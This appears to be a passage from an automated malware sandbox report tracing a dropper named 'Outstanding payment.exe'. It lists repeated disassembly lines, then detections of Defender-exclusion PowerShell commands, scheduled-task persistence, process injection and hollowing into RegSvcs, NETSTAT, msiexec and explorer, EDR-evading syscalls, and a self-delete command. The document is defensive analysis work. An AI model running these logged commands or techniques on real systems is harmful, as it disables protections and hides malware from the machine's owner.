Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DEA80 mov eax, dword ptr fs:[00000030h]	9_2_015DEA80
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01608A90 mov edx, dword ptr fs:[00000030h]	9_2_01608A90
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8AA0 mov eax, dword ptr fs:[00000030h]	9_2_015D8AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8AA0 mov eax, dword ptr fs:[00000030h]	9_2_015D8AA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0D59 mov eax, dword ptr fs:[00000030h]	9_2_015D0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0D59 mov eax, dword ptr fs:[00000030h]	9_2_015D0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D0D59 mov eax, dword ptr fs:[00000030h]	9_2_015D0D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8D59 mov eax, dword ptr fs:[00000030h]	9_2_015D8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8D59 mov eax, dword ptr fs:[00000030h]	9_2_015D8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8D59 mov eax, dword ptr fs:[00000030h]	9_2_015D8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8D59 mov eax, dword ptr fs:[00000030h]	9_2_015D8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D8D59 mov eax, dword ptr fs:[00000030h]	9_2_015D8D59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01658D20 mov eax, dword ptr fs:[00000030h]	9_2_01658D20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C6D10 mov eax, dword ptr fs:[00000030h]	9_2_015C6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C6D10 mov eax, dword ptr fs:[00000030h]	9_2_015C6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C6D10 mov eax, dword ptr fs:[00000030h]	9_2_015C6D10
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EAD00 mov eax, dword ptr fs:[00000030h]	9_2_015EAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EAD00 mov eax, dword ptr fs:[00000030h]	9_2_015EAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015EAD00 mov eax, dword ptr fs:[00000030h]	9_2_015EAD00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01604D1D mov eax, dword ptr fs:[00000030h]	9_2_01604D1D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FEDD3 mov eax, dword ptr fs:[00000030h]	9_2_015FEDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FEDD3 mov eax, dword ptr fs:[00000030h]	9_2_015FEDD3
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FCDF0 mov eax, dword ptr fs:[00000030h]	9_2_015FCDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015FCDF0 mov ecx, dword ptr fs:[00000030h]	9_2_015FCDF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654DD7 mov eax, dword ptr fs:[00000030h]	9_2_01654DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654DD7 mov eax, dword ptr fs:[00000030h]	9_2_01654DD7
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCDEA mov eax, dword ptr fs:[00000030h]	9_2_015CCDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCDEA mov eax, dword ptr fs:[00000030h]	9_2_015CCDEA
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F0DE1 mov eax, dword ptr fs:[00000030h]	9_2_015F0DE1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01606DA0 mov eax, dword ptr fs:[00000030h]	9_2_01606DA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CDB1 mov ecx, dword ptr fs:[00000030h]	9_2_0160CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CDB1 mov eax, dword ptr fs:[00000030h]	9_2_0160CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CDB1 mov eax, dword ptr fs:[00000030h]	9_2_0160CDB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F8DBF mov eax, dword ptr fs:[00000030h]	9_2_015F8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F8DBF mov eax, dword ptr fs:[00000030h]	9_2_015F8DBF
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAC50 mov eax, dword ptr fs:[00000030h]	9_2_015DAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAC50 mov eax, dword ptr fs:[00000030h]	9_2_015DAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAC50 mov eax, dword ptr fs:[00000030h]	9_2_015DAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAC50 mov eax, dword ptr fs:[00000030h]	9_2_015DAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAC50 mov eax, dword ptr fs:[00000030h]	9_2_015DAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAC50 mov eax, dword ptr fs:[00000030h]	9_2_015DAC50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6C50 mov eax, dword ptr fs:[00000030h]	9_2_015D6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6C50 mov eax, dword ptr fs:[00000030h]	9_2_015D6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015D6C50 mov eax, dword ptr fs:[00000030h]	9_2_015D6C50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F0C44 mov eax, dword ptr fs:[00000030h]	9_2_015F0C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F0C44 mov eax, dword ptr fs:[00000030h]	9_2_015F0C44
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DCC74 mov eax, dword ptr fs:[00000030h]	9_2_015DCC74
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01604C59 mov eax, dword ptr fs:[00000030h]	9_2_01604C59
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0C00 mov eax, dword ptr fs:[00000030h]	9_2_015E0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0C00 mov eax, dword ptr fs:[00000030h]	9_2_015E0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0C00 mov eax, dword ptr fs:[00000030h]	9_2_015E0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E0C00 mov eax, dword ptr fs:[00000030h]	9_2_015E0C00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0160CC00 mov eax, dword ptr fs:[00000030h]	9_2_0160CC00
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654C0F mov eax, dword ptr fs:[00000030h]	9_2_01654C0F
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CEC20 mov eax, dword ptr fs:[00000030h]	9_2_015CEC20
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2CDC mov eax, dword ptr fs:[00000030h]	9_2_015E2CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2CDC mov eax, dword ptr fs:[00000030h]	9_2_015E2CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2CDC mov eax, dword ptr fs:[00000030h]	9_2_015E2CDC
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8CD0 mov eax, dword ptr fs:[00000030h]	9_2_015C8CD0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01602CF0 mov eax, dword ptr fs:[00000030h]	9_2_01602CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01602CF0 mov eax, dword ptr fs:[00000030h]	9_2_01602CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01602CF0 mov eax, dword ptr fs:[00000030h]	9_2_01602CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01602CF0 mov eax, dword ptr fs:[00000030h]	9_2_01602CF0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCCC8 mov eax, dword ptr fs:[00000030h]	9_2_015CCCC8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164CCA0 mov ecx, dword ptr fs:[00000030h]	9_2_0164CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164CCA0 mov eax, dword ptr fs:[00000030h]	9_2_0164CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164CCA0 mov eax, dword ptr fs:[00000030h]	9_2_0164CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_0164CCA0 mov eax, dword ptr fs:[00000030h]	9_2_0164CCA0
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654CA8 mov eax, dword ptr fs:[00000030h]	9_2_01654CA8
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015C8C8D mov eax, dword ptr fs:[00000030h]	9_2_015C8C8D
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F8CB1 mov eax, dword ptr fs:[00000030h]	9_2_015F8CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015F8CB1 mov eax, dword ptr fs:[00000030h]	9_2_015F8CB1
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01606F60 mov eax, dword ptr fs:[00000030h]	9_2_01606F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01606F60 mov eax, dword ptr fs:[00000030h]	9_2_01606F60
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F5B mov eax, dword ptr fs:[00000030h]	9_2_015E2F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F5B mov eax, dword ptr fs:[00000030h]	9_2_015E2F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F5B mov eax, dword ptr fs:[00000030h]	9_2_015E2F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F5B mov eax, dword ptr fs:[00000030h]	9_2_015E2F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F5B mov eax, dword ptr fs:[00000030h]	9_2_015E2F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F5B mov eax, dword ptr fs:[00000030h]	9_2_015E2F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F5B mov eax, dword ptr fs:[00000030h]	9_2_015E2F5B
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCF50 mov eax, dword ptr fs:[00000030h]	9_2_015CCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCF50 mov eax, dword ptr fs:[00000030h]	9_2_015CCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCF50 mov eax, dword ptr fs:[00000030h]	9_2_015CCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCF50 mov eax, dword ptr fs:[00000030h]	9_2_015CCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCF50 mov eax, dword ptr fs:[00000030h]	9_2_015CCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015CCF50 mov eax, dword ptr fs:[00000030h]	9_2_015CCF50
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F47 mov eax, dword ptr fs:[00000030h]	9_2_015E2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F47 mov eax, dword ptr fs:[00000030h]	9_2_015E2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F47 mov eax, dword ptr fs:[00000030h]	9_2_015E2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F47 mov eax, dword ptr fs:[00000030h]	9_2_015E2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F47 mov eax, dword ptr fs:[00000030h]	9_2_015E2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F47 mov eax, dword ptr fs:[00000030h]	9_2_015E2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F47 mov eax, dword ptr fs:[00000030h]	9_2_015E2F47
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAF42 mov eax, dword ptr fs:[00000030h]	9_2_015DAF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAF42 mov eax, dword ptr fs:[00000030h]	9_2_015DAF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015DAF42 mov eax, dword ptr fs:[00000030h]	9_2_015DAF42
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654F40 mov eax, dword ptr fs:[00000030h]	9_2_01654F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654F40 mov eax, dword ptr fs:[00000030h]	9_2_01654F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654F40 mov eax, dword ptr fs:[00000030h]	9_2_01654F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_01654F40 mov eax, dword ptr fs:[00000030h]	9_2_01654F40
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: 9_2_015E2F7B mov eax, dword ptr fs:[00000030h]	9_2_015E2F7B

Source: C:\Users\user\Desktop\Outstanding payment.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process token adjusted: Debug	Jump to behavior

Source: C:\Users\user\Desktop\Outstanding payment.exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe"
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iBSWjb.exe"
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iBSWjb.exe"	Jump to behavior

Allocates memory in foreign processes

Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write			Jump to behavior

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0x15AA4F2
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0x15AA56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtClose: Indirect: 0x155A56C
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	NtQueueApcThread: Indirect: 0x155A4F2	Jump to behavior

Injects a PE file into a foreign processes

Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A			Jump to behavior

Maps a DLL or memory area into another process

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\NETSTAT.EXE protection: execute and read and write	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section loaded: NULL target: C:\Windows\SysWOW64\msiexec.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: read write
Source: C:\Windows\SysWOW64\msiexec.exe	Section loaded: NULL target: C:\Windows\explorer.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 1028	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Thread register set: target process: 1028
Source: C:\Windows\SysWOW64\msiexec.exe	Thread register set: target process: 1028

Queues an APC in another process (thread injection)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Thread APC queued: target process: C:\Windows\explorer.exe

Jump to behavior

Sample uses process hollowing technique

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\NETSTAT.EXE base address: F60000			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Section unmapped: C:\Windows\SysWOW64\msiexec.exe base address: 120000

Writes to foreign memory regions

Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: F83008	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 401000	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: C7F008	Jump to behavior

Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\Outstanding payment.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\iBSWjb.exe"	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpE0D0.tmp"	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\iBSWjb" /XML "C:\Users\user\AppData\Local\Temp\tmpF30F.tmp"	Jump to behavior
Source: C:\Users\user\AppData\Roaming\iBSWjb.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Process created: C:\Windows\SysWOW64\cmd.exe /c del "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Source: explorer.exe, 0000000A.00000000.2105292943.0000000009B41000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000003.3097842641.0000000009C21000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4538468202.0000000009C22000.00000004.00000001.00020000.00000000.sdmp	Binary or memory string: Shell_TrayWnd=
Source: explorer.exe, 0000000A.00000000.2091841907.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4526760540.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Program Manager
Source: explorer.exe, 0000000A.00000000.2091841907.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4531040280.0000000004B00000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4526760540.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 0000000A.00000000.2091841907.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4526760540.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progman
Source: explorer.exe, 0000000A.00000000.2091841907.0000000001731000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 0000000A.00000002.4526760540.0000000001731000.00000002.00000001.00040000.00000000.sdmp	Binary or memory string: Progmanlock
Source: explorer.exe, 0000000A.00000000.2090992450.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000A.00000002.4525785289.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: PProgman

Source: C:\Users\user\Desktop\Outstanding payment.exe	Queries volume information: C:\Users\user\Desktop\Outstanding payment.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Outstanding payment.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
